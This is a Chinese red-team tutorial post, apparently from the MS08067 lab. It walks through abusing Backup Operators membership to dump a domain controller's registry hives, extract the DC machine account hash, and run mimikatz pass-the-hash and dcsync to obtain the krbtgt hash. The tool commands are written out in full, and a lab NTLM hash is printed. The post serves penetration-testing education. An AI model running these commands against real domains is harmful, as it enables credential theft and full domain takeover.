红队之路 | 域森林攻击之Backup Operators Group权限滥用

点击星标,即时接收最新推文

0f64b0fdca64f733e9e379db220615a3.png

  

Backup Operators组的成员可以备份和恢复计算机上所有的文件,不论保护这些文件的权限是什么。Backup Operators也可以登录和关闭计算机。这个组不能被重命名,删除或者移动。默认情况下,这个内置的组没有成员,可以在域控上执行备份和恢复操作。

在渗透测试过程,我们可以先枚举这个组的成员,如果我们控制的某个账户是这个组的成员,我们则可以利用进行权限提升。

下面使用PowerView的Get-DomainGroupMember方法进行枚举,如下图所示:

Get-DomainGroupMember -Identity "Backup Operators" -Recurse

92ae10ba956685e1fbf43b6ab5222a9c.png

枚举Backup Operators成员

可以看到dave是backup operators组的成员。接下来,我们尝试使用BackupOperatorToolkit(https://github.com/improsec/BackupOperatorToolkit)提取域控主机dev-DC01的SAM,SECURITY和 SYSTEM文件。这里指定目标主机的本地路径C:\ ,如下图所示:

.\BackupOperatorToolkit.exe DUMP c:\ \\dev-DC01.dev.ms08067.cn

71129a1c13f00162f1b111d68b2629fe.png

提取注册表文件

查看提取结果,因为当前用户dev\dave是backup operators组成员,所以可以访问域控文件,如下图所示:

d01fd5cf252c8fc55fd101891148f3bc.png

查看提取结果

将提取的文件复制到当前主机并使用secretdump提取域控机器账户hash,如下图所示:

copy \\dev-DC01.dev.ms08067.cn\c$\SAM .
copy \\dev-DC01.dev.ms08067.cn\c$\SYSTEM .
copy \\dev-DC01.dev.ms08067.cn\c$\SECURITY .
.\secretdump.exe LOCAL -system .\SYSTEM -security .\SECURITY -sam .\SAM

a29f69851557c6a58b9e6d5139b4e6fa.png

提取域控机器账户密码hash

在获得了域控机器账户的密码hash后,因为dev-DC01$不是域控的本地管理员,所以我们不能直接利用进行横向移动。

但是dev-DC01$账号有域复制权限,我们可以执行dcsync来获取任何用户的hash,包括krbtgt账号。我们用mimikatz对域控机器账户dev-DC01$ 执行hash传递,然后在新创建的cmd执行dcsync。

以本地管理员权限运行mimikatz:

privilege::debug
# hash传递
sekurlsa::pth /user:dev-DC01$ /ntlm:67b2f25b507fab18d3ead189e902f450 /domain:dev.ms08067.cn
# 在新创建的窗口执行dcsync
lsadump::dcsync /domain:dev.ms08067.cn /user:dev\krbtgt

821506fd960e5a5bb5597db5833dc476.png

域控机器账户hash PtH并dcsync

从上图输出可以看到我们成功获取了dev.ms08067.cn域krbtgt账户的hash,接下来可以尝试制作黄金票据进行横向移动。当然也可以提取域管理员密码hash进行横向移动。

—  实验室旗下直播培训课程  —

af9b35f5f14981bca8476cf879624755.png

5ff30232e144613f37eb9cfd58c3e455.jpeg

3cde1d35ebeb5f77c1545ae607a1ceb9.jpeg52243ca5a11e8846ab74eecfa7c1b0cc.png

df95ced9fd908e3dfc6004d42d4a7585.png

fe8f00f5b5fad429e01a737fd6eed808.jpeg

a3b363325c298df910887252a746dfb4.jpeg

58309f50e8ff8130d176644e9ee5ae70.jpeg

d52585fea4e705d6df29cd5185181b16.png

和20000+位同学加入MS08067一起学习

df55f8255d61b4cd29003362c3b94f87.gif

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值